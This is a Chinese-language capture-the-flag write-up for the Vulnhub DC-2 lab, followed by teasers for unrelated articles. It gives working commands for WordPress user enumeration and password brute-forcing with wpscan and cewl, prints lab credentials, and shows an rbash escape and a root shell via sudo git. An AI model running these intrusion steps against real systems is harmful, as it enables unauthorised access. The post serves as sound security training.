Vulnhub DC-2-编程知识

Vulnhub DC-2

news/2025/1/20 22:44:29/文章来源:https://www.cnblogs.com/chang-room/p/18682630

Vulnhub DC-2

与DC1同样的思路，但是输ip跳转到dc-2，改host文件解决。

发现cms是WordPress。

得到flag1

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.More passwords is always better, but sometimes you just can’t win them all.Log in as one to see the next flag.If you can’t find it, log in as another.

提示用cewl生成字典爆破密码登录后台。cewl可以针对网站生成对应的字典（从网站中提取文本）

利用wpscan枚举用户名。

wpscan --url http://dc-2 -e u

生成字典

cewl http://dc-2 -w ~/Desktop/pass.txt

开始爆破

wpscan --url http://dc-2 -U ~/Desktop/users.txt -P ~/Desktop/pass.txt

拿到两组账密

Username: jerry, Password: adipiscing
Username: tom, Password: parturient

在Jerry后台找到flag2

If you can't exploit WordPress and take a shortcut, there is another way.Hope you found another entry point.

提示不从cms考虑。信息搜集时发现存在7744端口ssh服务，用爆破出的账密尝试连接。

ssh tom@192.168.1.8 -p 7744

成功连接。无cat权限查看flag3，但是vi可以

oor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

估计又是要提权了。

发现没有su权限。

tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ ls /home/tom/usr/bin
less  ls  scp  vi

只有四个命令权限，考虑rbash逃逸。

BASH_CMDS[x]=/bin/sh #一个内部变量，在受限模式下用于重定向某些命令到指定的路径
x #实际上会启动一个新的不受限的 shell
export PATH=$PATH:/bin/#扩展path环境变量
export PATH=$PATH:/usr/bin/

su jerry进入到Jerry角色

Good to see that you've made it this far - but you're not home yet. You still need to get the final flag (the only flag that really counts!!!).  No hints here - you're on your own now.  :-)Go on - git outta here!!!!

提示git提权

sudo git help config
!/bin/sh

拿到最终flag

 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /\  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   Congratulatons!!!A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.If you enjoyed this CTF, send me a tweet via @DCAU7.

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/872364.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

【PyTorch】使用回调和日志记录来监控模型训练

就像船长依赖仪器来保持航向一样，数据科学家需要回调和日志记录系统来监控和指导他们在PyTorch中的模型训练。在本教程中，我们将指导您实现回调和日志记录功能，以成功训练模型。一、理解回调和日志记录回调和日志记录是PyTorch中有效管理和监控机器学习模型训练过程的基本…

TBtools的使用

转录本：由一条基因通过转录，由于可变剪切形成的一种或多种可供编码蛋白质的成熟mRNA。另外非编码RNA也可能有转录本的说法。最长转录本：可变剪切一个基因得到多个序列长度不同的转录本，应选序列最长的进行数据分析。 CDS：蛋白质编码区，是与蛋白序列一一对应的DNA序列，不…

finalshell远程连接Centos虚拟机配置固定ip地址

为虚拟机Centos的远程连接软件Finalshell或者xshell等软件配置固定ip地址提示：然后全点确定，就好了，这里就不演示了输入指令vim /etc/sysconfig/network-scripts/ifcfg-ens33BOOTPROTO=static #将ip设置为静态IPADDR="192.168.142.130" #静态ip地址，这个130是在0…

【scikit-opt库】智能算法开源库

这个开源库包含以下7个优化算法：网址：https://scikit-opt.github.io/ 使用文档：文档链接：https://scikit-opt.github.io/scikit-opt/#/en/README

【模拟电子技术】07-BJT特性曲线共射

【模拟电子技术】07-BJT特性曲线共射我们要用三极管，那么就必须考虑输入和输出，即考虑输入特性曲线和输出特性曲线UCE固定，考虑UBE和IB的关系，就相当于一个PN结了！考虑多个变量的关系时，我们往往固定其他变量，然后看其中两个变量的关系，然后两两拿出来观察。三极管有三…

ssm日记04

发现springboot实在是太方便了，虽然还没有具体写过案例，不过直接免去一大堆配置真的太舒服了，明天会接着写案例，掌握是ssm整合springboot 这是学习一个小时的视频

ssm日记01

大前天即2025.1.15-17学习了spring的前后台联合案例就是springmvc的ssm整合包括异常处理的方法跟着敲了一边代码，不知道之后会不会使用或者说自己敲一遍，或许到自己跟着视频写案例才会使用到，或者说自己写一个小项目的时候才会用到写这个异常处理受益匪浅，知道了从系统异…

ssm日记

前天即1.18号学习了springmvc的拦截器知识但是好像用的不多拦截器是相对于过滤器是在请求进入web容器之后拦截和审核的其中主要是实现一个接口的三个方法分别是preHandle postHandle afterCompletion有相关执行顺序这是代码和注释

学习ssm日记

补发一下前几次的学习日记这是前两天在学maven高级的代码都是自己敲得跟着视频学习了分模块开发和父工程的创建以及关于依赖和pom文件相关知识

OpenWRT配置旁路由/中继模式，同时配置作为NAS必备的IPv6公网IP

1. 环境和要达成的目标 1.1 目标主路由已配置好拨号，DHCP，IPv6 已刷OpenWRT路由B70作为中继路由，提高覆盖，解决一些老旧只能设备接入问题。 OpenWRT路由同时插入移动硬盘，配置WebDAV和smba作为NAS使用，所以此路自身要能获取到IPv6地址。我的OpenWRT路由是极路由4，刷的…

【网关系统】通用设计

本文准备围绕七个点来讲网关，分别是网关的基本概念、网关设计思路、网关设计重点、流量网关、业务网关、常见网关对比，对基础概念熟悉的朋友可以根据目录查看自己感兴趣的部分。一、什么是网关网关，很多地方将网关比如成门，没什么问题，但是需要区分网关与网桥的区别，…

一文告诉你Linux下如何用C语言实现ini配置文件的解析和保存

嵌入式项目开发中，会有很多功能模块需要频繁修改参数，Linux下我们可以通过ini格式的文件保存配置信息。本文通过开源库iniparser，详细讲解如何用C语言实现ini文件的参数解析和配置保存。本文代码实例获取方式见文末。一、ini文件 1 什么是 ini文件INI（Initialization F…

Vulnhub DC-2

Vulnhub DC-2

相关文章